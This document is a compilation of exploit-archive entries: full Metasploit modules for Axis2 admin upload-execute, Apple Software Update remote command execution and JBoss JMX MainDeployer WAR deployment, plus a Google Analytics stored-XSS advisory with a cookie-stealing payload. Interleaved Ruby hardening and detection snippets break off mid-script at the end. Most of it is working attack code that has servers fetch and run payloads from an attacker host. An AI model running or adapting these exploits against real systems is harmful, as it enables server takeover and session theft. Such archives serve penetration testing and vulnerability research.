Joshua D. Abraham/Axis2 Upload Exec (via REST) ( na)
##
# $Id: axis2_deployer_rest.rb 11178 2010-11-30 18:17:33Z jduck $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit
  Rank = ExcellentRanking

  HttpFingerprint = { :pattern => [ /Apache.*(Coyote|Tomcat)/ ] }

  include Msf::Exploit::Remote::HttpClient

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Axis2 Upload Exec (via REST)',
      'Version'        => '$Revision: 11178 $',
      'Description'    => %q{
          This module logs in to an Axis2 Web Admin Module instance using a specific user/pass
        and uploads and executes commands via deploying a malicious web service by using REST.
      },
      'References'     =>
        [
          # General
          [ 'URL', 'http://www.rapid7.com/security-center/advisories/R7-0037.jsp' ],
          [ 'URL', 'http://spl0it.org/files/talks/source_barcelona10/Hacking%20SAP%20BusinessObjects.pdf' ],
          [ 'CVE', '2010-0219' ],
        ],
      'Platform'       => [ 'java', 'win', 'linux' ], # others?
      'Targets'        =>
        [
          [ 'Java', {
              'Arch' => ARCH_JAVA,
              'Platform' => 'java'
            },
          ],
          #
          # Platform specific targets only
          #
          [ 'Windows Universal',
            {
              'Arch' => ARCH_X86,
              'Platform' => 'win'
            },
          ],
          [ 'Linux X86',
            {
              'Arch' => ARCH_X86,
              'Platform' => 'linux'
            },
          ],
        ],
      'Author'         => [ 'Joshua Abraham <jabra[at]rapid7.com>' ],
      'License'        => MSF_LICENSE
    ))

    register_options(
      [
        Opt::RPORT(8080),
        OptString.new('USERNAME', [ false, 'The username to authenticate as','admin' ]),
        OptString.new('PASSWORD', [ false, 'The password for the specified username','axis2' ]),
        OptString.new('PATH', [ true, "The URI path of the axis2 app", '/axis2'])
      ], self.class)
    register_autofilter_ports([ 8080 ])
  end

  def upload_exec(session)
    contents=''
    name = Rex::Text.rand_text_alpha(8)
    services_xml = %Q{
<service name="#{name}" scope="application">
  <description>
    #{Rex::Text.rand_text_alphanumeric(50 + rand(50))}
  </description>
  <messageReceivers>
    <messageReceiver
      mep="http://www.w3.org/2004/08/wsdl/in-only"
      class="org.apache.axis2.rpc.receivers.RPCInOnlyMessageReceiver"/>
    <messageReceiver
      mep="http://www.w3.org/2004/08/wsdl/in-out"
      class="org.apache.axis2.rpc.receivers.RPCMessageReceiver"/>
  </messageReceivers>
  <parameter name="ServiceClass">
    metasploit.PayloadServlet
  </parameter>
</service>
}

    if target.name =~ /Java/
      zip = payload.encoded_jar
      zip.add_file("META-INF/services.xml", services_xml)
      # We need this class as a wrapper to run in a thread. For some reason
      # the Payload class is giving illegal access exceptions without it.
      path = File.join(Msf::Config.install_root, "data", "java", "metasploit", "PayloadServlet.class")
      fd = File.open(path, "rb")
      servlet = fd.read(fd.stat.size)
      fd.close
      zip.add_file("metasploit/PayloadServlet.class", servlet)
      contents = zip.pack
    else
    end

    boundary = rand_text_alphanumeric(6)
    data = "--#{boundary}\r\nContent-Disposition: form-data; name=\"filename\"; "
    data << "filename=\"#{name}.jar\"\r\nContent-Type: application/java-archive\r\n\r\n"
    data << contents
    data << "\r\n--#{boundary}--"

    res = send_request_raw({
      'uri'     => "/#{datastore['PATH']}/axis2-admin/upload",
      'method'  => 'POST',
      'data'    => data,
      'headers' =>
        {
          'Content-Type'   => 'multipart/form-data; boundary=' + boundary,
          'Content-Length' => data.length,
          'Cookie'         => "JSESSIONID=#{session}",
        }
    }, 25)

    if (res and res.code == 200)
      print_status("Successfully uploaded")
    else
      print_error("Error uploading #{res}")
      return
    end

=begin
    res = send_request_raw({
      'uri'     => "/#{datastore['PATH']}/axis2-web/HappyAxis.jsp",
      'method'  => 'GET',
      'headers' =>
        {
          'Cookie' => "JSESSIONID=#{session}",
        }
    }, 25)
    puts res.body
    puts res.code
    if res.code > 200 and res.code < 300
      if ( res.body.scan(/([A-Z] \Program Files\Apache Software Foundation\Tomcat \d.\d)/i) )
        dir = $1.sub(/: /,':') + "\\webapps\\dswsbobje\\WEB-INF\\services\\"
        puts dir
      else
        if ( a.scan(/catalina\.home<\/th><td style=".*">(.*)&nbsp;<\/td>/i) )
          dir = $1 + "/webapps/dswsbobje/WEB-INF/services/"
          puts dir
        end
      end
    end
=end

    print_status("Polling to see if the service is ready")

    # Try to execute the payload
    1.upto 5 do
      Rex::ThreadSafe.sleep(3)
      res = send_request_raw({
        'uri'     => "/#{datastore['PATH']}/services/#{name}/run",
        'method'  => 'GET',
        'headers' =>
          {
            'Cookie' => "JSESSIONID=#{session}",
          }
      }, 25)
      if res.code >= 200 and res.code < 300
        # This should usually mean we got a shell
        break
      end
    end
  end

  def exploit
    user = datastore['USERNAME']
    pass = datastore['PASSWORD']
    path = datastore['PATH']

    success = false
    srvhdr = '?'
    begin
      res = send_request_cgi(
        {
          'method' => 'POST',
          'uri'    => "/#{path}/axis2-admin/login",
          'ctype'  => 'application/x-www-form-urlencoded',
          'data'   => "userName=#{user}&password=#{pass}&submit=+Login+",
        }, 25)

      if not (res.kind_of? Rex::Proto::Http::Response)
        raise RuntimeError.new("http://#{rhost}:#{rport}/#{path}/axis2-admin not responding")
      end
      if res.code == 404
        raise RuntimeError.new("http://#{rhost}:#{rport}/#{path}/axis2-admin returned code 404")
      end

      srvhdr = res.headers['Server']
      if res.code == 200
        # Could go with res.headers["Server"] =~ /Apache-Coyote/i
        # as well but that seems like an element someone's more
        # likely to change
        success = true if(res.body.scan(/Welcome to Axis2 Web/i).size == 1)
        if (res.headers['Set-Cookie'] =~ /JSESSIONID=(.*);/)
          session = $1
        end
      end
    rescue ::Rex::ConnectionError
      print_error("http://#{rhost}:#{rport}/#{path}/axis2-admin Unable to attempt authentication")
    end

    if success
      print_good("http://#{rhost}:#{rport}/#{path}/axis2-admin [#{srvhdr}] [Axis2 Web Admin Module] successful login '#{user}' : '#{pass}'")
      upload_exec(session)
    else
      print_error("http://#{rhost}:#{rport}/#{path}/axis2-admin [#{srvhdr}] [Axis2 Web Admin Module] failed to login as '#{user}'")
    end
  end
end
This Metasploit module logs in to an Axis2 Web Admin Module instance using a specific user/pass and uploads and executes commands via deploying a malicious web service by using REST.
Roberto Suggi Liverani/Google Analytics Stored Cross Site Scripting ( na)
======================================================
=================
= Google Analytics - Stored Cross Site Scripting
Vulnerability
=
= Vendor Website:
= http://www.google.com
=
= Affected Version:
= -- http://www.google.com/analytics/
=
= Public disclosure on 8th December 2008
=
======================================================
==================
Available online at:
http://www.security-assessment.com/files/advisories/20
08-12-08_Google_Analytics_Stored_Cross_Site_Scripting.
pdf
== Issue Details ==
Security-Assessment.com recently conducted a security
review of the Google Analytics service, provided by
Google Inc. Analysis discovered a stored Cross Site
Scripting (XSS) vulnerability present in the Analytics
web application. A malicious user is able to inject
arbitrary browser content through web sites subscribed
to the Google Analytics service. The script content
injected was rendered into the Google Analytics
Content Detail page which uses an Ajax-based menu to
list the URL and the number of page views of the
visited pages.
The following URL points to the Google Analytics
Content Detail page:
URL:
https://www.google.com/analytics/reporting/content_detail
JavaScript Vulnerable:
goog.analytics.PropertyManager._getInstance()._broadcastChange()
== Exploit Description - Attacker ==
A malicious user visits site xxx.com which is
subscribed to the Google Analytics service and employs
the Google Analytics JavaScript tracking code. The
attacker performs the following request which includes
the Cross Site Scripting payload and the Google
Analytics JavaScript function broadcastChange():
Malicious GET Request:
http://xxx.com/search.asp?keyword=test");alert(document.cookie);goog.analytics.PropertyManager._getInstance()._broadcastChange("drilldown","/search.asp?keyword=test")
In the example above, the broadcastChange function is
used to terminate the malicious payload injection and
to make the victim's browser execute the malicious
script with no errors.
The web server responds with HTTP Status 200. The URL
of the page requested and the Cross Site Scripting
payload is passed to the Google Analytics service
through the JavaScript tracking code.
The injected script content results in the following
HTML being generated by the Google Analytics Content
Detail page:
<a title='/search.asp?keyword=test");alert(document.cookie);goog.analytics.PropertyManager._getInstance()._broadcastChange("drilldown","/search.asp?keyword=test'
href='javascript:goog.analytics.PropertyManager._getInstance()._broadcastChange("drilldown","/search.asp?keyword=test");alert(document.cookie);goog.analytics.PropertyManager._getInstance()._broadcastChange("drilldown","/search.asp?keyword=test")'>
/search.asp?keyword=test");alert(document.cookie);goog.analytics.PropertyManager._getInstance()._broadcastChange("drilldown","/search.asp?keyword=test</a>
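The rendering flaw above, reduced to a runnable Ruby example added here (it is not Google's code and not part of the advisory). build_link_vulnerable rebuilds the anchor the way the Content Detail page did, dropping the tracked path straight into a JavaScript string literal inside a javascript: href and into the title attribute with no encoding; build_link_safe encodes the value for each context in turn (JavaScript string literal first, then HTML attribute). top_level_statements is a small string-aware scanner that counts statements in the href script, which makes the difference checkable: three statements for the vulnerable link, one for the safe one. Only the call prefix and the injected path come from the advisory; the function names, INJECTED_PATH and the builders are assumptions for the example.

```ruby
require 'json'
require 'cgi'

# The call the Content Detail menu wraps around each tracked page path.
CALL_PREFIX = 'goog.analytics.PropertyManager._getInstance()._broadcastChange("drilldown",'

# Constructed sample input: the path the advisory's GET request leaves in the
# tracking data. It closes the "drilldown" argument, injects a statement and
# re-opens the same call so the template's trailing ")" still parses cleanly.
INJECTED_PATH = '/search.asp?keyword=test");alert(document.cookie);' \
                'goog.analytics.PropertyManager._getInstance()._broadcastChange("drilldown","/search.asp?keyword=test'

# How the menu item was effectively built: the raw path is interpolated into a
# JavaScript string literal inside a javascript: href and into the title
# attribute, with no encoding for either context.
def build_link_vulnerable(path)
  call = CALL_PREFIX + '"' + path + '")'
  "<a title='#{path}' href='javascript:#{call}'>#{path}</a>"
end

# Hardened builder: the value is first turned into a JavaScript string literal
# (to_json escapes " and \), then the whole attribute value is HTML-encoded
# (CGI.escapeHTML encodes & < > " '), so neither context can be broken out of.
def build_link_safe(path)
  call = CALL_PREFIX + path.to_json + ')'
  "<a title='#{CGI.escapeHTML(path)}' href='javascript:#{CGI.escapeHTML(call)}'>#{CGI.escapeHTML(path)}</a>"
end

# Recover the script a browser would execute from the href: attribute value
# decoded, "javascript:" scheme stripped. Returns nil when there is no such href.
def href_script(html)
  m = html.match(/href='javascript:([^']*)'/)
  m ? CGI.unescapeHTML(m[1]) : nil
end

# Count top-level JavaScript statements: semicolons outside string literals
# plus one. A correctly encoded link always yields exactly one statement.
def top_level_statements(js)
  count = 1
  quote = nil
  i = 0
  while i < js.length
    c = js[i]
    if quote
      if c == '\\'
        i += 1            # skip the escaped character
      elsif c == quote
        quote = nil
      end
    elsif c == '"' || c == "'"
      quote = c
    elsif c == ';'
      count += 1
    end
    i += 1
  end
  count
end

if __FILE__ == $0
  puts top_level_statements(href_script(build_link_vulnerable(INJECTED_PATH))) # 3: the payload runs
  puts top_level_statements(href_script(build_link_safe(INJECTED_PATH)))       # 1: still a single call
end
```

Encoding per context is the minimum fix; the better design is not to build javascript: URLs from data at all, but to attach the click handler with a DOM listener and carry the path in a data attribute.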
== Exploit Description - Victim ==
The victim logs into Google Analytics service. The
login page redirects the user to:
https://www.google.com/analytics/settings/
The user clicks on the View Reports for its website
(which was attacked with the injection described
above).
The user is redirected to a similar URL:
https://www.google.com/analytics/reporting/?reset=1&id=xxxxxxx&scid=yyyyyyy
The user accesses the Content Overview section and
clicks on one of the listed pages. The user is then
redirected to a similar URL (in this example, the user
clicked on index.html):
https://www.google.com/analytics/reporting/content_detail?id=xxxxxxx&pdr=20080726-20080825&cmp=average&d1=%2Findex.html
In the Content Detail page for index.html, an
Ajax-based menu lists the most visited pages and their
relative page views.
When the user clicks on the link of the page which was
attacked, the browser executes the injected payload
from the google.com domain.
Eventually, the user is redirected to the Content
Detail page for the search.asp?keyword=test entry. No
JavaScript errors are returned to the JavaScript
console.
== Impact ==
Cross Site Scripting attacks can be used in
combination with a browser exploitation framework such
as BeEF, Browser Rider, Metasploit browser exploits,
Backweb, Anehta, XSS Proxy and Backframe. These
frameworks allow for complex JavaScript and
browser-based exploit development.
Other potential impacts include:
* Hijacking users' browser sessions;
* Capturing sensitive information viewed by Google
Analytics users;
* Defacement of the Google Analytics website;
* Port scanning of internal user hosts;
* Directed delivery of additional browser-based
exploits, such as ActiveX or URI handler exploits
== Solution ==
Security-Assessment.com follows responsible disclosure
and promptly contacted Google when the issue was first
discovered. First contact with the vendor was made on
the 25th August 2008. Confirmation of the
vulnerability was made by Google on the 4th September
2008.
On the 3rd December 2008, Google communicated to
Security-Assessment.com that Google Analytics has been
fixed. Security-Assessment.com performed a regression
test on the same attack vector and confirmed the issue
has been resolved.
== Credit ==
Discovered and advised to Google Inc.
August 2008 by Roberto Suggi Liverani of
Security-Assessment.com
Personal Page: http://malerisch.net
== Greetings ==
Hello SA guys,
Really L00king forward 'Hacking In The Sun'!!! ;-)
== About Security-Assessment.com ==
Security-Assessment.com is a New Zealand based world
leader in web application testing, network security
and penetration testing. Our clients include some of
the largest globally recognised companies in areas
such as finance, telecommunications, broadcasting,
legal and government. Our aim is to provide the very
best independent advice and a high level of technical
expertise while creating long and lasting professional
relationships with our clients.
Security-Assessment.com is committed to security
research and development, and its team continues to
identify and responsibly publish vulnerabilities in
public and private software vendor's products. Members
of the Security-Assessment.com R&D team are globally
recognised through their release of whitepapers and
presentations related to new security research.
For further information on this issue or any of our
service offerings, contact us
Web Site: www.security-assessment.com
Roberto Suggi Liverani
Security-Assessment.com
Google Analytics suffers from a stored cross site scripting vulnerability.
Moritz Jodeit/appleupdate-exec.txt ( na)
---------------------------------------------------------------------
Apple Mac OS X Software Update Remote Command Execution Vulnerability
Copyright (c) 2007 Moritz Jodeit <moritz@jodeit.org> (2007/12/17)
---------------------------------------------------------------------
I. Vulnerability Description
The OS X Software Update mechanism uses so-called `distribution packages' [1],
which basically consist of two parts: the XML `catalog file', which lists the
available updates, and the `distribution definition files' [1], which contain
information encoded in XML and JavaScript defining every aspect of the
user experience when installing an update.
When OS X checks for new updates, it first contacts swscan.apple.com
to receive the XML catalog file. This file references the distribution
definition files, which can reside on another server. Software Update
fetches these files and calls some of their JavaScript functions to check
whether the update is suited for the local machine.
The catalog file and the distribution definition files are both retrieved
over HTTP without any authentication. By running a malicious update server,
it is possible to provide distribution definition files which execute
arbitrary commands via JavaScript on the machine requesting the
update. The system.run() method can be used for this if the
`allow-external-scripts' option is set in the distribution definition
file, as documented in the "Installer JavaScript Reference" [2].
[1] http://developer.apple.com/documentation/DeveloperTools/Reference/DistributionDefinitionRef/
[2] http://developer.apple.com/documentation/DeveloperTools/Reference/InstallerJavaScriptRef/
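A defender-side check written for this page (example code, not Apple's and not part of the advisory or the module below): parse a distribution definition file with REXML and report the two things the advisory identifies as precondition and sink, the allow-external-scripts option and a script body that calls system.run(). Both sample files are constructed for the example; MALICIOUS_DIST mirrors the shape of what the module's generate_dist emits, BENIGN_DIST is a plain compatibility check. The function and constant names are assumptions.

```ruby
require 'rexml/document'

# Constructed sample: external scripts enabled and a choice whose visibility
# expression calls a function that runs a shell command (the advisory's sink).
MALICIOUS_DIST = <<~XML
  <?xml version="1.0" encoding="UTF-8"?>
  <installer-gui-script minSpecVersion='1'>
    <options allow-external-scripts="yes"/>
    <choices-outline ui='SoftwareUpdate'><line choice='su'/></choices-outline>
    <choice id='su' visible='chk()'/>
    <script>function chk() { system.run('/bin/bash', '-c', "id"); }</script>
  </installer-gui-script>
XML

# Constructed benign sample: the usual version check, no external scripts.
BENIGN_DIST = <<~XML
  <?xml version="1.0" encoding="UTF-8"?>
  <installer-gui-script minSpecVersion='1'>
    <choices-outline ui='SoftwareUpdate'><line choice='su'/></choices-outline>
    <choice id='su' visible='isSupported()'/>
    <script>function isSupported() { return system.compareVersions(system.version.ProductVersion, '10.4') &gt;= 0; }</script>
  </installer-gui-script>
XML

# Returns a list of findings for one distribution definition file; an empty
# list means nothing in it looked dangerous.
def inspect_dist(xml)
  findings = []
  root = REXML::Document.new(xml).root
  return ['not an installer-gui-script document'] unless root && root.name == 'installer-gui-script'

  # The option the advisory names as the precondition for system.run().
  REXML::XPath.each(root, 'options') do |opt|
    if opt.attributes['allow-external-scripts'].to_s.strip.casecmp?('yes')
      findings << 'allow-external-scripts is enabled'
    end
  end

  # Any script body that invokes system.run(): deciding whether an update
  # applies only needs read-only system.* queries, never a process launch.
  REXML::XPath.each(root, 'script') do |s|
    text = s.texts.map(&:value).join
    if text =~ /\bsystem\.run\s*\(/
      findings << "script calls system.run(): #{text.strip[0, 60]}"
    end
  end
  findings
end

if __FILE__ == $0
  puts inspect_dist(MALICIOUS_DIST)          # two findings
  puts inspect_dist(BENIGN_DIST).inspect     # []
end
```

The check is only a triage aid: the real weakness is that the files are fetched over plain HTTP without any authenticity check, so anything on the path can swap them. Run it on what a client actually received, for example from a capture or a caching proxy, not on what the server claims to serve.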
II. Impact
Combined with the ability to intercept requests to the official Apple update
server by other means like ARP or DNS spoofing, it is possible to execute
arbitrary commands on all clients requesting updates. OS X automatically
checks for updates at regular intervals (default is weekly), which allows
for exploitation, even without any user intervention.
III. Solution
This vulnerability was fixed with the latest Apple update APPLE-SA-2007-12-17.
IV. Vendor Response
2007/12/06 Initial contact with <product-security@apple.com>
2007/12/06 Acknowledgement of received report
2007/12/12 Agreement on public release date
2007/12/17 Coordinated release of updates and advisory
V. Proof Of Concept
##
# $Id$
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/projects/Framework/
##
require 'msf/core'
module Msf
class Exploits::Osx::Browser::Software_Update < Msf::Exploit::Remote
include Exploit::Remote::HttpServer::HTML
def initialize(info = {})
super(update_info(info,
'Name' => 'Apple OS X Software Update Command Execution',
'Description' => %q{
This module exploits a feature in the Distribution Packages,
which are used in the Apple Software Update mechanism. This feature
allows for arbitrary command execution through JavaScript. This exploit
provides the malicious update server. Requests must be redirected to
this server by other means for this exploit to work.
},
'Author' => [ 'Moritz Jodeit <moritz@jodeit.org>' ],
'License' => MSF_LICENSE,
'Version' => '$Revision$',
'References' =>
[
['CVE', '2007-5863'],
],
'Payload' =>
{
'BadChars' => "\x00",
'DisableNops' => true,
},
'Platform' => 'osx',
'Targets' =>
[
[
'Automatic',
{
'Platform' => [ 'unix' ],
'Arch' => ARCH_CMD,
},
],
],
'DisclosureDate' => 'Dec 17 2007',
'DefaultTarget' => 0))
register_options(
[
OptPort.new('SRVPORT', [ true, "The local port to listen on.", 80 ]),
OptString.new('URIPATH', [ true, "The URI to use for this exploit.", "/" ])
], self.class)
end
# Encode some characters using character entity references and escape
# any quotation characters, by splitting the string into multiple parts.
def encode_payload(payload)
# & < > and ' become XML character entity references so the script survives
# the XML parser; a double quote closes the JavaScript string, concatenates a
# single-quoted '"' and reopens it, so the payload never contains a bare ".
encoded = payload.gsub(/[&<>"']/) do |s|
case s
when '&' then "&amp;"
when '<' then "&lt;"
when '>' then "&gt;"
when '"' then '"+\'"\'+"'
when '\'' then "&apos;"
end
end
return '"' + encoded + '"'
end
# Generate the initial catalog file with references to the
# distribution script, which does the actual exploitation.
def generate_catalog(server)
languages = [ "", "Dutsch", "English", "French", "German", "Italian", "Japanese",
"Spanish", "da", "fi", "ko", "no", "pt", "sv", "zh_CN", "zh_TW" ]
productkey = rand_text_numeric(3) + "-" + rand_text_numeric(4)
distfile = rand_text_alpha(8) + ".dist"
sucatalog = '<?xml version="1.0" encoding="UTF-8"?>'
sucatalog << '<!DOCTYPE plist PUBLIC "-//Apple Computer//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">'
sucatalog << '<plist version="1.0">'
sucatalog << '<dict>'
sucatalog << '<key>Products</key><dict>'
sucatalog << "<key>#{productkey}</key><dict>"
sucatalog << '<key>Distributions</key><dict>'
languages.each do |l|
sucatalog << "<key>#{l}</key><string>http://#{server}/#{distfile}</string>\n"
end
sucatalog << '</dict></dict></dict></dict></plist>'
return sucatalog
end
# Generate distribution script, which calls our payload using JavaScript.
def generate_dist(payload)
func = rand_text_alpha(8)
dist = '<?xml version="1.0" encoding="UTF-8"?>'
dist << "<installer-gui-script minSpecVersion='1'>"
dist << '<options allow-external-scripts = "yes"/>'
dist << "<choices-outline ui='SoftwareUpdate'>"
dist << "<line choice='su'/>"
dist << "</choices-outline>"
dist << "<choice id='su' visible ='#{func}()'/>"
dist << "<script>"
dist << "function #{func}() { system.run('/bin/bash', '-c', #{encode_payload(payload)}); }"
dist << "</script>"
dist << "</installer-gui-script>"
return dist
end
def on_request_uri(cli, request)
date = Time.now
server = "swscan.apple.com"
header = {
'Content-Type' => 'text/plain',
'Last-Modified' => date,
'Date' => date,
}
if request.uri =~ /\.sucatalog$/
print_status("Sending initial distribution package to #{cli.peerhost}:#{cli.peerport}")
body = generate_catalog(server)
elsif request.uri =~ /\.dist$/
print_status("Sending distribution script to #{cli.peerhost}:#{cli.peerport}")
return if ((p = regenerate_payload(cli)) == nil)
body = generate_dist(p.encoded)
else
return
end
send_response(cli, body, header)
handler(cli)
end
end
end
Apple Mac OS X Software Update suffers from a remote command execution vulnerability. Full Metasploit module included.
metasploit/JBoss JMX Console Deployer Upload and Execute ( multiple)
##
# $Id: jboss_maindeployer.rb 10754 2010-10-19 22:24:33Z jduck $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = ExcellentRanking
HttpFingerprint = { :pattern => [ /(Jetty|JBoss)/ ] }
include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::Remote::HttpServer
include Msf::Exploit::EXE
def initialize(info = {})
super(update_info(info,
'Name' => 'JBoss JMX Console Deployer Upload and Execute',
'Description' => %q{
This module can be used to execute a payload on JBoss servers that have
an exposed "jmx-console" application. The payload is put on the server by
using the jboss.system:MainDeployer functionality. To accomplish this, a
temporary HTTP server is created to serve a WAR archive containing our
payload. This method will only work if the target server allows outbound
connections to us.
},
'Author' => [ 'jduck', 'Patrick Hof' ],
'License' => MSF_LICENSE,
'Version' => '$Revision: 10754 $',
'References' =>
[
[ 'CVE', '2007-1036' ],
[ 'CVE', '2010-0738' ], # by using VERB other than GET/POST
[ 'OSVDB', '33744' ],
[ 'URL', 'http://www.redteam-pentesting.de/publications/jboss' ]
],
'Privileged' => true,
'Platform' => [ 'win', 'linux' ],
'Stance' => Msf::Exploit::Stance::Aggressive,
'Targets' =>
[
#
# detect via the jboss.system:type=ServerInfo MBean (see detect_platform)
#
[ 'Automatic', { } ],
#
# Platform specific targets only
#
[ 'Windows Universal',
{
'Arch' => ARCH_X86,
'Platform' => 'win'
},
],
[ 'Linux Universal',
{
'Arch' => ARCH_X86,
'Platform' => 'linux'
},
],
#
# Java version
#
[ 'Java Universal',
{
'Arch' => ARCH_JAVA,
'Payload' =>
{
'DisableNops' => true
}
}
]
],
'DefaultTarget' => 0))
register_options(
[
Opt::RPORT(8080),
OptString.new('USERNAME', [ false, 'The username to authenticate as' ]),
OptString.new('PASSWORD', [ false, 'The password for the specified username' ]),
OptString.new('SHELL', [ false, 'The system shell to use', 'automatic' ]),
OptString.new('JSP', [ false, 'JSP name to use without .jsp extension (default: random)', nil ]),
OptString.new('APPBASE', [ false, 'Application base name, (default: random)', nil ]),
OptString.new('PATH', [ true, 'The URI path of the console', '/jmx-console' ]),
OptString.new('VERB', [ true, 'The HTTP verb to use (for CVE-2010-0738)', 'POST' ]),
OptString.new('WARHOST', [ false, 'The host to request the WAR payload from' ]),
], self.class)
end
def auto_target
print_status("Attempting to automatically select a target...")
if not (plat = detect_platform())
raise RuntimeError, 'Unable to detect platform!'
end
# TODO: detection requires HTML parsing
arch = ARCH_X86
# see if we have a match
targets.each { |t|
if (t['Platform'] == plat) and (t['Arch'] == arch)
return t
end
}
# no matching target found
return nil
end
def exploit
datastore['BasicAuthUser'] = datastore['USERNAME']
datastore['BasicAuthPass'] = datastore['PASSWORD']
jsp_name = datastore['JSP'] || rand_text_alphanumeric(8+rand(8))
app_base = datastore['APPBASE'] || rand_text_alphanumeric(8+rand(8))
verb = 'GET'
if (datastore['VERB'] != 'GET' and datastore['VERB'] != 'POST')
verb = 'HEAD'
end
mytarget = target
if (target.name =~ /Automatic/)
mytarget = auto_target()
if (not mytarget)
raise RuntimeError, "Unable to automatically select a target"
end
print_status("Automatically selected target \"#{mytarget.name}\"")
else
print_status("Using manually selected target \"#{mytarget.name}\"")
end
arch = mytarget.arch
# Find out which shell if we're using a Java target
if (mytarget.name =~ /Java/)
if not (plat = detect_platform())
raise RuntimeError, 'Unable to detect platform!'
end
case plat
when 'linux'
datastore['SHELL'] = '/bin/sh'
when 'win'
datastore['SHELL'] = 'cmd.exe'
end
print_status("SHELL set to #{datastore['SHELL']}")
else
# set arch/platform from the target
plat = [Msf::Module::PlatformList.new(mytarget['Platform']).platforms[0]]
end
# We must regenerate the payload in case our auto-magic changed something.
return if ((p = exploit_regenerate_payload(plat, arch)) == nil)
# Generate the WAR containing the payload
if (mytarget.name =~ /Java/)
@war_data = Msf::Util::EXE.to_war(p.encoded,
{
:app_name => app_base,
:jsp_name => jsp_name
})
else
exe = generate_payload_exe(
{
:code => p.encoded,
:arch => arch,
:platform => plat
})
@war_data = Msf::Util::EXE.to_jsp_war(exe,
{
:app_name => app_base,
:jsp_name => jsp_name
})
end
#
# UPLOAD
#
resource_uri = '/' + app_base + '.war'
service_url = 'http://' + datastore['SRVHOST'] + ':' + datastore['SRVPORT'] + resource_uri
print_status("Starting up our web service on #{service_url} ...")
start_service({'Uri' => {
'Proc' => Proc.new { |cli, req|
on_request_uri(cli, req)
},
'Path' => resource_uri
}})
if (datastore['WARHOST'])
service_url = 'http://' + datastore['WARHOST'] + ':' + datastore['SRVPORT'] + resource_uri
end
print_status("Asking the JBoss server to deploy (via MainDeployer) #{service_url}")
if (verb == "POST")
res = send_request_cgi({
'method' => verb,
'uri' => datastore['PATH'] + '/HtmlAdaptor',
'vars_post' =>
{
'action' => 'invokeOpByName',
'name' => 'jboss.system:service=MainDeployer',
'methodName' => 'deploy',
'argType' => 'java.lang.String',
'arg0' => service_url
}
})
else
res = send_request_cgi({
'method' => verb,
'uri' => datastore['PATH'] + '/HtmlAdaptor',
'vars_get' =>
{
'action' => 'invokeOpByName',
'name' => 'jboss.system:service=MainDeployer',
'methodName' => 'deploy',
'argType' => 'java.lang.String',
'arg0' => service_url
}
})
end
if (! res)
raise RuntimeError, "Unable to deploy WAR archive [No Response]"
end
if (res.code < 200 or res.code >= 300)
case res.code
when 401
print_error("Warning: The web site asked for authentication: #{res.headers['WWW-Authenticate'] || res.headers['Authentication']}")
end
raise RuntimeError, "Upload to deploy WAR archive [#{res.code} #{res.message}]"
end
# wait for the data to be sent
print_status("Waiting for the server to request the WAR archive....")
waited = 0
while (not @war_sent)
select(nil, nil, nil, 1)
waited += 1
if (waited > 30)
raise RuntimeError, "Server did not request WAR archive -- Maybe it can't connect back to us?"
end
end
print_status("Shutting down the web service...")
stop_service
#
# EXECUTE
#
print_status("Executing #{app_base}...")
# JBoss might need some time for the deployment. Try 5 times at most and
# wait 3 seconds inbetween tries
num_attempts = 5
num_attempts.times { |attempt|
uri = '/' + app_base + '/' + jsp_name + '.jsp'
res = send_request_cgi({
'uri' => uri,
'method' => verb
}, 20)
msg = nil
if (! res)
msg = "Execution failed on #{app_base} [No Response]"
elsif (res.code < 200 or res.code >= 300)
msg = "Execution failed on #{app_base} [#{res.code} #{res.message}]"
elsif (res.code == 200)
print_good("Successfully triggered payload at '#{uri}'")
break
end
if (attempt < num_attempts - 1)
msg << ", retrying in 3 seconds..."
print_error(msg)
select(nil, nil, nil, 3)
else
print_error(msg)
end
}
#
# DELETE
#
# XXX: Does undeploy have an invokeByName?
#
print_status("Undeploying #{app_base} ...")
res = send_request_cgi({
'method' => verb,
'uri' => datastore['PATH'] + '/HtmlAdaptor',
'vars_post' =>
{
'action' => 'invokeOpByName',
'name' => 'jboss.system:service=MainDeployer',
'methodName' => 'undeploy',
'argType' => 'java.lang.String',
'arg0' => app_base
}
}, 20)
if (! res)
print_error("WARNING: Undeployment failed on #{app_base} [No Response]")
elsif (res.code < 200 or res.code >= 300)
print_error("WARNING: Undeployment failed on #{app_base} [#{res.code} #{res.message}]")
end
handler
end
# Handle incoming requests from the server
def on_request_uri(cli, request)
#print_status("on_request_uri called: #{request.inspect}")
if (not @war_data)
print_error("A request came in, but the WAR archive wasn't ready yet!")
return
end
print_status("Sending the WAR archive to the server...")
send_response(cli, @war_data)
@war_sent = true
end
# Try to autodetect the target platform
def detect_platform()
print_status("Attempting to automatically detect the platform...")
path = datastore['PATH'] + '/HtmlAdaptor?action=inspectMBean&name=jboss.system:type=ServerInfo'
res = send_request_raw(
{
'uri' => path
}, 20)
if (not res) or (res.code != 200)
print_error("Failed: Error requesting #{path}")
return nil
end
if (res.body =~ /<td.*?OSName.*?(Linux|Windows).*?<\/td>/m)
os = $1
if (os =~ /Linux/i)
return 'linux'
elsif (os =~ /Windows/i)
return 'win'
end
end
nil
end
end
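The detection-side counterpart to the module, added here as an example (not part of Metasploit or JBoss): analyse_jmx_log reads Common Log Format access log lines and flags the two behaviours the module relies on, a verb other than GET or POST reaching the console with a 2xx response (the CVE-2010-0738 constraint bypass that the VERB option exploits) and an invokeOpByName call to jboss.system:service=MainDeployer with methodName=deploy and a remote arg0. The SAMPLE_LOG lines, the client addresses and the .war/.jsp names are constructed for the example; the function and struct names are assumptions.

```ruby
require 'cgi'

# Constructed sample access log (Common Log Format) for the example: one client
# probing with HEAD and deploying a WAR from its own host, one admin using the
# console normally with GET/POST.
SAMPLE_LOG = <<~LOG
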